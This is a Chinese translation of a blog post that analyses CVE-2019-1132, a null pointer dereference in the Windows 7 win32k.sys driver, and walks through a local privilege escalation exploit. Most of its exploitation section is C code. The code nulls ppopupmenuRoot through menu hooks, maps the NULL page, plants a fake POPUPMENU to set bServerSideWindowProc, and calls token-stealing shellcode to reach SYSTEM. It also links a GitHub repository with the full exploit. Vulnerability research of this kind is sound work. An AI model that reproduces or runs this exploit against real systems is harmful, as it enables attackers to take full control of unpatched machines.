<h5 class="alert-heading">译文声明</h5><p>本文是翻译文章，文章原作者pwnrip，文章来源：pwnrip.com &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br/>原文地址：https://pwnrip.com/exploiting-cve-2019-1132-another-null-pointer-dereference-in-windows-kernel/
 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</p><hr/><p class="mb-0">译文仅供参考，具体内容表达以及含义原文为准</p><div class="article-content"><p><span class="highslide-img"><img src="https://bbs.zkaq.cn/upload/userfile/639/a2f02e400ad86d4e02a9a22966331ce6.png"/></span></p><p>&nbsp;</p><p>CVE–2019-1132是Windows kernel中的一个空指针引用漏洞。空指针引用漏洞已经消失多年了，但仍然被用于恶意软件攻击中。本文介绍CVE-2019-1132漏洞的技术细节，以及PoC代码。</p><h2 id="h2-0">简介</h2><p>该漏洞是win32k.sys驱动中的空指针引用，会导致Windows 7和Windows Server 2008系统中的权限提升。微软已于2019年7月发布漏洞补丁。本文将对漏洞进行分析并创建了Windows 7 x86环境+6月份修复补丁的PoC。</p><p>&nbsp;</p><h2 id="h2-1">漏洞概述</h2><p>该来的位于<code>win32k!xxxMNOpenHierarchy</code>函数中，因为该函数没有检查指向<code>tag POPUPMENU->ppopupmenuRoot</code>的指针是否为空。该域可以被不同的操作访问，如果攻击者可以将该域设置为<code>NULL</code>，就可以引发空指针引用。</p><p>为了利用该漏洞，攻击者需要以特定方式来映射该null页，然后成功进行权限提升。<br/>为了将<code>ppopupmenuRoot</code>设置为<code>NULL</code>，首先要释放该域指向的<code>root popupmenu</code>菜单。研究人员首先打开<code>root popupmenu</code>的一个sub-menu，<code>sub-menu</code>会在kernel模式下调用<code>win32k!xxxMNOpenHierarchy</code>，该调用会创建第二个<code>sub-menu</code>。创建第二个<code>popupmenu</code>时，<code>root menu</code>的<code>sub-menu</code>的<code>ppopupmenuRoot</code>域会含有<code>NULL</code>。当<code>win32k!HMAssignmentLock</code>函数尝试访问该域时，会执行一个空指针引用操作，导致BSOD（Windows蓝屏）。</p><p>&nbsp;</p><h2 id="h2-2">漏洞触发</h2><p>为了触发该漏洞，研究人员使用了ESET博客中的方法。总结如下：</p><p>1.首先创建一个窗口和3个menu对象，然后将meau项合并。</p><pre>/*&nbsp;Creating&nbsp;the&nbsp;menu&nbsp;*/
&nbsp;for&nbsp;(int&nbsp;i&nbsp;=&nbsp;0;&nbsp;i&nbsp;&lt;&nbsp;3;&nbsp;i++)
&nbsp;hMenuList[i]&nbsp;=&nbsp;CreateMenu();/*&nbsp;Appending&nbsp;the&nbsp;menus&nbsp;along&nbsp;with&nbsp;the&nbsp;item&nbsp;*/
&nbsp;for&nbsp;(int&nbsp;i&nbsp;=&nbsp;0;&nbsp;i&nbsp;&lt;&nbsp;3;&nbsp;i++)
&nbsp;{
&nbsp;AppendMenuA(hMenuList[i],&nbsp;MF_POPUP&nbsp;|&nbsp;MF_MOUSESELECT,&nbsp;(UINT_PTR)hMenuList[i&nbsp;+&nbsp;1],&nbsp;"item");
&nbsp;}
&nbsp;AppendMenuA(hMenuList[2],&nbsp;MF_POPUP&nbsp;|&nbsp;MF_MOUSESELECT,&nbsp;(UINT_PTR)0,&nbsp;"item");/*&nbsp;Creating&nbsp;a&nbsp;main&nbsp;window&nbsp;class&nbsp;*/
&nbsp;xxRegisterWindowClassW(L"WNDCLASSMAIN",&nbsp;0x000,&nbsp;DefWindowProc);
&nbsp;hWindowMain&nbsp;=&nbsp;xxCreateWindowExW(L"WNDCLASSMAIN",
&nbsp;WS_EX_LAYERED&nbsp;|&nbsp;WS_EX_TOOLWINDOW&nbsp;|&nbsp;WS_EX_TOPMOST,
&nbsp;WS_VISIBLE,
&nbsp;GetModuleHandleA(NULL));
&nbsp;printf("Handle&nbsp;of&nbsp;the&nbsp;mainWindow&nbsp;:&nbsp;0x%08Xn",&nbsp;(unsigned&nbsp;int)hWindowMain);
&nbsp;ShowWindow(hWindowMain,&nbsp;SW_SHOWNOACTIVATE);</pre><p>2.在<code>WH_CALLWNDPROC</code>和<code>EVENT_SYSTEM_MENUPOPUPSTART</code>上安装hook。</p><pre>/*&nbsp;Hooking&nbsp;the&nbsp;WH_CALLWNDPROC&nbsp;function&nbsp;*/
&nbsp;SetWindowsHookExW(WH_CALLWNDPROC,&nbsp;xxWindowHookProc,&nbsp;GetModuleHandleA(NULL),&nbsp;GetCurrentThreadId());/*&nbsp;Hooking&nbsp;the&nbsp;trackpopupmenuEx&nbsp;WINAPI&nbsp;call&nbsp;*/
&nbsp;HWINEVENTHOOK&nbsp;hEventHook&nbsp;=&nbsp;SetWinEventHook(EVENT_SYSTEM_MENUPOPUPSTART,&nbsp;EVENT_SYSTEM_MENUPOPUPSTART,&nbsp;GetModuleHandleA(NULL),&nbsp;xxWindowEventProc,
&nbsp;GetCurrentProcessId(),&nbsp;GetCurrentThreadId(),&nbsp;0);</pre><p>3.用<code>TrackPopupMenuEx</code>函数来展示<code>root popup menu</code>。当<code>TrackPopupMenuEx</code>被调用时，会调用<code>win32k!xxxTrackPopupMenuEx</code>函数来展示菜单。然后会通过<code>EVENT_SYSTEM_MENUPOPUPSTART</code>类型的事件来通知用户。</p><pre>/*&nbsp;Setting&nbsp;the&nbsp;root&nbsp;popup&nbsp;menu&nbsp;to&nbsp;null&nbsp;*/printf("Setting&nbsp;the&nbsp;root&nbsp;popup&nbsp;menu&nbsp;to&nbsp;nulln");
release&nbsp;=&nbsp;0;
TrackPopupMenuEx(hMenuList[0],&nbsp;0,&nbsp;0,&nbsp;0,&nbsp;hWindowMain,&nbsp;NULL);</pre><p>4.这会触发事件hook函数<code>xxWindowEventProc</code>。通过发送<code>MN_OPENHIERARCHY</code>消息，它最终会调用函数<code>win32k!xxxMNOpenHierarchy</code>。</p><pre>staticVOID
CALLBACKxxWindowEventProc(
&nbsp;&nbsp;&nbsp;&nbsp;HWINEVENTHOOK&nbsp;hWinEventHook,
&nbsp;&nbsp;&nbsp;&nbsp;DWORD&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;event,
&nbsp;&nbsp;&nbsp;&nbsp;HWND&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;hwnd,
&nbsp;&nbsp;&nbsp;&nbsp;LONG&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;idObject,
&nbsp;&nbsp;&nbsp;&nbsp;LONG&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;idChild,
&nbsp;&nbsp;&nbsp;&nbsp;DWORD&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;idEventThread,
&nbsp;&nbsp;&nbsp;&nbsp;DWORD&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;dwmsEventTime){
&nbsp;&nbsp;&nbsp;&nbsp;UNREFERENCED_PARAMETER(hWinEventHook);
&nbsp;&nbsp;&nbsp;&nbsp;UNREFERENCED_PARAMETER(event);
&nbsp;&nbsp;&nbsp;&nbsp;UNREFERENCED_PARAMETER(idObject);
&nbsp;&nbsp;&nbsp;&nbsp;UNREFERENCED_PARAMETER(idChild);
&nbsp;&nbsp;&nbsp;&nbsp;UNREFERENCED_PARAMETER(idEventThread);
&nbsp;&nbsp;&nbsp;&nbsp;UNREFERENCED_PARAMETER(dwmsEventTime);

&nbsp;&nbsp;&nbsp;&nbsp;bEnterEvent&nbsp;=&nbsp;TRUE;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(iCount&nbsp;&lt;&nbsp;ARRAYSIZE(hwndMenuList))
&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;hwndMenuList[iCount]&nbsp;=&nbsp;hwnd;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;iCount++;
&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;SendMessageW(hwnd,&nbsp;MN_SELECTITEM,&nbsp;0,&nbsp;0);
&nbsp;&nbsp;&nbsp;&nbsp;SendMessageW(hwnd,&nbsp;MN_SELECTFIRSTVALIDITEM,&nbsp;0,&nbsp;0);
&nbsp;&nbsp;&nbsp;&nbsp;PostMessageW(hwnd,&nbsp;MN_OPENHIERARCHY,&nbsp;0,&nbsp;0);
}</pre><p>5.当函数<code>win32k!xxxMNOpenHierarchy</code>被调用后，会调用<code>win32k!xxxCreateWindowEx</code>函数来创建另一个<code>popupmenu</code>对象。在调用<code>win32k!xxxCreateWindowEx</code>函数期间，<code>WM_NCCREATE</code>消息会被发送给用户，可以在<code>WH_CALLWNDPROC hook</code>函数中看到，比如<code>xxWindowHookProc</code>。</p><p>6.在<code>xxWindowHookProc</code>函数中，研究人员会通过检查<code>root menu</code>对象的<code>window handle</code>来检查是否创建<code>rootpopup menu</code>对象，并验证下一个<code>popup menu</code>对象window handle是否为<code>NULL</code>。研究人员还确认了该消息是否为<code>WM_NCCREATE</code>。</p><pre>staticLRESULT
CALLBACKxxWindowHookProc(INT&nbsp;code,&nbsp;WPARAM&nbsp;wParam,&nbsp;LPARAM&nbsp;lParam){
&nbsp;&nbsp;&nbsp;&nbsp;tagCWPSTRUCT&nbsp;*cwp&nbsp;=&nbsp;(tagCWPSTRUCT&nbsp;*)lParam;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(cwp-&gt;message&nbsp;==&nbsp;WM_NCCREATE&nbsp;&amp;&amp;&nbsp;bEnterEvent&nbsp;&amp;&amp;&nbsp;hwndMenuList[release]&nbsp;&amp;&amp;&nbsp;!hwndMenuList[release+1])
&nbsp;&nbsp;&nbsp;&nbsp;{&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;printf("Sending&nbsp;the&nbsp;MN_CANCELMENUS&nbsp;messagen");
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;SendMessage(hwndMenuList[release],&nbsp;MN_CANCELMENUS,&nbsp;0,&nbsp;0);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;bEnterEvent&nbsp;=&nbsp;FALSE;
&nbsp;&nbsp;&nbsp;&nbsp;}&nbsp;&nbsp;&nbsp;&nbsp;return&nbsp;CallNextHookEx(0,&nbsp;code,&nbsp;wParam,&nbsp;lParam);
}</pre><p>然后发送<code>WM_CANCELMENUS</code>到<code>root popupmenu</code>对象。</p><p>最终会调用<code>win32k!xxxMNCancel</code>，并设置<code>root popupmenu</code>的<code>fDestroyed</code>位。然后调用<code>win32k!xxxMNCloseHierarchy</code>关系root popupmenu对象的栈中的<code>sub-menu</code>。</p><p>因为sub-menu还没有被创建，因此函数会<code>win32k!xxxMNCloseHierarchy</code>跳过子menu对象，也不会设置<code>fDestroyed</code>位，当<code>sub-menu</code>存在时会破坏root popupmenu对象。</p><p>现在<code>tagPOPUPMENU->ppopupmenuRoot</code>被设置为<code>NULL</code>，因为<code>sub-menu</code>的<code>root popup menu</code>被破坏了，如截图所示。</p><p><span class="highslide-img"><img class="aligncenter" alt="" src="https://pwnrip.com/wp-content/uploads/2019/07/tagPOPUPMENNU.png" style=""/></span></p><p>Ppopupmenu设置为NULL</p><p>&nbsp;</p><h2 id="h2-3">漏洞利用</h2><p>此时，<code>ppopupmenuRoot</code>会指向NULL。为了从NULL页触发内存访问，研究人员发送<code>MN_BUTTONDOWN</code>消息到sub-menu对象。研究人员最开始尝试利用ESET建议的方法来触发该漏洞，但是通过发送<code>MN_BUTTONDOWN</code>消息可以调用<code>win32k!xxxMNOpenHierarchy</code> 函数。</p><p>还有另一种方法来调用<code>win32k!xxxMNOpenHierarchy</code>函数，那就是通过sub-menu作为根（root）的<code>TrackPopupMenuEx</code>。所以研究人员使用<code>TrackPopupMenuEx</code>来调用<code>win32k!xxxMNOpenHierarchy</code>函数，并最终访问了NULL页面。</p><p><span class="highslide-img"><img class="aligncenter" alt="image.png" src="https://pwnrip.com/wp-content/uploads/2019/07/Figure-13.-NULL-access.png" style=""/></span></p><p>访问NULL Page</p><p>可以看到访问了位置<code>0x0000001c</code>，该位置指向的是释放的<code>root popup menu</code>对象的<code>tagWND</code>对象。</p><p>然后该地址被发送给<code>win32k!HMAssignmentLock</code>函数。</p><p>ESET博客中提到，<code>bServerSideWindowProc</code>位是在函数<code>win32k!HMDestroyedUnlockedObject</code>中设置的。但是研究人员尝试后还是无法设置攻击窗口的位。因此研究人员使用<code>clockObj</code>指令递减来设置 <code>bServerSideWindowProc</code>位。</p><p>下面介绍下漏洞利用的步骤：</p><p>1.首先创建一个作为攻击窗口的窗口。</p><pre>/*&nbsp;Creating&nbsp;the&nbsp;hunt&nbsp;window&nbsp;class&nbsp;*/
&nbsp;&nbsp;&nbsp;&nbsp;xxRegisterWindowClassW(L"WNDCLASSHUNT",&nbsp;0x000,&nbsp;xxMainWindowProc);
&nbsp;&nbsp;&nbsp;&nbsp;hWindowHunt&nbsp;=&nbsp;xxCreateWindowExW(L"WNDCLASSHUNT",
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;WS_EX_LEFT,
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;WS_OVERLAPPEDWINDOW,
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;GetModuleHandleA(NULL));&nbsp;&nbsp;&nbsp;&nbsp;printf("Handle&nbsp;of&nbsp;the&nbsp;huntWindow&nbsp;:&nbsp;0x%08Xn",&nbsp;(unsigned&nbsp;int)hWindowHunt);</pre><p>2.然后使用<code>NtAllocateVirtualMemory</code>来在NULL页面分配内存。</p><pre>/*&nbsp;Allocating&nbsp;the&nbsp;memory&nbsp;at&nbsp;NULL&nbsp;page&nbsp;*/
&nbsp;&nbsp;&nbsp;&nbsp;*(FARPROC&nbsp;*)&amp;NtAllocateVirtualMemory&nbsp;=&nbsp;GetProcAddress(GetModuleHandleW(L"ntdll"),&nbsp;"NtAllocateVirtualMemory");&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(NtAllocateVirtualMemory&nbsp;==&nbsp;NULL)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return&nbsp;1;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(!NT_SUCCESS(NtAllocateVirtualMemory(NtCurrentProcess(),
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&amp;MemAddr,&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0,
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&amp;MemSize,
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;MEM_COMMIT&nbsp;|&nbsp;MEM_RESERVE,
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;PAGE_READWRITE))&nbsp;||&nbsp;MemAddr&nbsp;!=&nbsp;NULL)
&nbsp;&nbsp;&nbsp;&nbsp;{&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;printf("[-]Memory&nbsp;alloc&nbsp;failed!n");&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return&nbsp;1;
&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;ZeroMemory(MemAddr,&nbsp;MemSize);</pre><p>3.然后使用<code>HMValidateHandle</code>函数技术就可以写了攻击窗口的<code>tagWND</code>对象的地址。</p><pre>/*&nbsp;Getting&nbsp;the&nbsp;tagWND&nbsp;of&nbsp;the&nbsp;hWindowHunt&nbsp;*/
&nbsp;&nbsp;&nbsp;&nbsp;PTHRDESKHEAD&nbsp;head&nbsp;=&nbsp;(PTHRDESKHEAD)xxHMValidateHandle(hWindowHunt);&nbsp;&nbsp;&nbsp;&nbsp;printf("Address&nbsp;of&nbsp;the&nbsp;win32k!tagWND&nbsp;of&nbsp;hWindowHunt&nbsp;:&nbsp;0x%08Xn",&nbsp;(unsigned&nbsp;int)head-&gt;deskhead.pSelf);</pre><p>4.研究人员在NULL页面伪造了一个假的<code>popupmenu</code>对象来满足设置攻击窗口的<code>bServerSideWindowProc</code>位的条件。</p><pre>/*&nbsp;Creating&nbsp;a&nbsp;fake&nbsp;POPUPMENU&nbsp;structure&nbsp;*/
&nbsp;&nbsp;&nbsp;&nbsp;DWORD&nbsp;dwPopupFake[0x100]&nbsp;=&nbsp;{&nbsp;0&nbsp;};
&nbsp;&nbsp;&nbsp;&nbsp;dwPopupFake[0x0]&nbsp;=&nbsp;(DWORD)0x1;&nbsp;//-&gt;flags
&nbsp;&nbsp;&nbsp;&nbsp;dwPopupFake[0x1]&nbsp;=&nbsp;(DWORD)0x1;&nbsp;//-&gt;spwndNotify
&nbsp;&nbsp;&nbsp;&nbsp;dwPopupFake[0x2]&nbsp;=&nbsp;(DWORD)0x1;&nbsp;//-&gt;spwndPopupMenu
&nbsp;&nbsp;&nbsp;&nbsp;dwPopupFake[0x3]&nbsp;=&nbsp;(DWORD)0x1;&nbsp;//-&gt;spwndNextPopup
&nbsp;&nbsp;&nbsp;&nbsp;dwPopupFake[0x4]&nbsp;=&nbsp;(DWORD)0x1;&nbsp;//-&gt;spwndPrevPopup
&nbsp;&nbsp;&nbsp;&nbsp;dwPopupFake[0x5]&nbsp;=&nbsp;(DWORD)0x1;&nbsp;//-&gt;spmenu
&nbsp;&nbsp;&nbsp;&nbsp;dwPopupFake[0x6]&nbsp;=&nbsp;(DWORD)0x1;&nbsp;//-&gt;spmenuAlternate
&nbsp;&nbsp;&nbsp;&nbsp;dwPopupFake[0x7]&nbsp;=&nbsp;(ULONG)head-&gt;deskhead.pSelf&nbsp;+&nbsp;0x12;&nbsp;&nbsp;//-&gt;spwndActivePopup
&nbsp;&nbsp;&nbsp;&nbsp;dwPopupFake[0x8]&nbsp;=&nbsp;(DWORD)0x1;&nbsp;&nbsp;//-&gt;ppopupmenuRoot
&nbsp;&nbsp;&nbsp;&nbsp;dwPopupFake[0x9]&nbsp;=&nbsp;(DWORD)0x1;&nbsp;//-&gt;ppmDelayedFree
&nbsp;&nbsp;&nbsp;&nbsp;dwPopupFake[0xA]&nbsp;=&nbsp;(DWORD)0x1;&nbsp;&nbsp;//-&gt;posSelectedItem
&nbsp;&nbsp;&nbsp;&nbsp;dwPopupFake[0xB]&nbsp;=&nbsp;(DWORD)0x1;&nbsp;//-&gt;posDropped
&nbsp;&nbsp;&nbsp;&nbsp;dwPopupFake[0xC]&nbsp;=&nbsp;(DWORD)0;/*&nbsp;Copying&nbsp;it&nbsp;to&nbsp;the&nbsp;NULL&nbsp;page&nbsp;*/
&nbsp;&nbsp;&nbsp;&nbsp;RtlCopyMemory(MemAddr,&nbsp;dwPopupFake,&nbsp;0x1000);</pre><p><code>win32k!HMAssignmentLock</code>函数（<code>0x0000001c</code>）访问的地址指向的是伪造的<code>popupmenu</code>对象的<code>spwndActivePopup</code>。然后研究人员将伪造的<code>popupmenu</code>对象的<code>spwndActivePopup</code>域设置为指向地址<code>tagWND + 0x12</code>。</p><p>这是因为在<code>[eax + 4]</code>减<code>clockObj</code>值的指令，<code>bServerSideWindowProc</code>位在<code>tagWND</code>对象的第<code>18</code>位。为了成功设置该位，<code>(eax + 4)</code>必须指向<code>tagWND</code>对象+<code>0x16</code>。</p><p>5.现在就可以访问映射到NULL页面的域，并验证攻击窗口的<code>bServerSideWindowProc</code>位是否设置。</p><p><span class="highslide-img"><img class="aligncenter" alt="" src="https://pwnrip.com/wp-content/uploads/2019/07/Figure-14.-setting-bServer.png" style=""/></span></p><p>设置bServerSideWindowProc位</p><p>6.可以看出设置了<code>bServerSideWindowProc</code>位。然后可以发送消息到攻击窗口，然后会被<code>xxMainWindowProc</code>处理。然后检查cs寄存器。如果cs寄存器等于<code>0x1b</code>，而且处于用户模式，就会失败否则就调用shellcode。</p><p>Shellcode执行后，就成功了：</p><pre>staticLRESULT
WINAPI
xxMainWindowProc(
&nbsp;&nbsp;&nbsp;&nbsp;_In_&nbsp;HWND&nbsp;&nbsp;&nbsp;hwnd,
&nbsp;&nbsp;&nbsp;&nbsp;_In_&nbsp;UINT&nbsp;&nbsp;&nbsp;msg,
&nbsp;&nbsp;&nbsp;&nbsp;_In_&nbsp;WPARAM&nbsp;wParam,
&nbsp;&nbsp;&nbsp;&nbsp;_In_&nbsp;LPARAM&nbsp;lParam
)
{&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(msg&nbsp;==&nbsp;0x1234)
&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;WORD&nbsp;um&nbsp;=&nbsp;0;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;__asm
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//&nbsp;Grab&nbsp;the&nbsp;value&nbsp;of&nbsp;the&nbsp;CS&nbsp;register&nbsp;and
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//&nbsp;save&nbsp;it&nbsp;into&nbsp;the&nbsp;variable&nbsp;UM.
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//int&nbsp;3
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;mov&nbsp;ax,&nbsp;cs
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;mov&nbsp;um,&nbsp;ax
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//&nbsp;If&nbsp;UM&nbsp;is&nbsp;0x1B,&nbsp;this&nbsp;function&nbsp;is&nbsp;executing&nbsp;in&nbsp;usermode
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//&nbsp;code&nbsp;and&nbsp;something&nbsp;went&nbsp;wrong.&nbsp;Therefore&nbsp;output&nbsp;a&nbsp;message&nbsp;that
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//&nbsp;the&nbsp;exploit&nbsp;didn&#39;t&nbsp;succeed&nbsp;and&nbsp;bail.
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(um&nbsp;==&nbsp;0x1b)
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//&nbsp;USER&nbsp;MODE
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;printf("[!]&nbsp;Exploit&nbsp;didn&#39;t&nbsp;succeed,&nbsp;entered&nbsp;sprayCallback&nbsp;with&nbsp;user&nbsp;mode&nbsp;privileges.rn");
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ExitProcess(-1);&nbsp;//&nbsp;Bail&nbsp;as&nbsp;if&nbsp;this&nbsp;code&nbsp;is&nbsp;hit&nbsp;either&nbsp;the&nbsp;target&nbsp;isn&#39;t&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//&nbsp;vulnerable&nbsp;or&nbsp;something&nbsp;is&nbsp;wrong&nbsp;with&nbsp;the&nbsp;exploit.
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;else
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;success&nbsp;=&nbsp;TRUE;&nbsp;//&nbsp;Set&nbsp;the&nbsp;success&nbsp;flag&nbsp;to&nbsp;indicate&nbsp;the&nbsp;sprayCallback()
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//&nbsp;window&nbsp;procedure&nbsp;is&nbsp;running&nbsp;as&nbsp;SYSTEM.
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Shellcode();&nbsp;//&nbsp;Call&nbsp;the&nbsp;Shellcode()&nbsp;function&nbsp;to&nbsp;perform&nbsp;the&nbsp;token&nbsp;stealing&nbsp;and
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//&nbsp;to&nbsp;remove&nbsp;the&nbsp;Job&nbsp;object&nbsp;on&nbsp;the&nbsp;Chrome&nbsp;renderer&nbsp;process.
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;}&nbsp;&nbsp;&nbsp;&nbsp;return&nbsp;DefWindowProcW(hwnd,&nbsp;msg,&nbsp;wParam,&nbsp;lParam);
}</pre><p><span class="highslide-img"><img class="aligncenter" alt="" src="https://pwnrip.com/wp-content/uploads/2019/07/Figure-16.-Final-1024x259.png" style=""/></span></p><p>获取<code>NT AUTHORITY/SYSTEM</code>权限</p><p>漏洞利用代码已经在安装了6月份补丁的Windows 7 x86环境中进行了测试，代码参见github: https://github.com/Vlad-tri/CVE-2019-1132 。<br/></p></div><p><br/></p>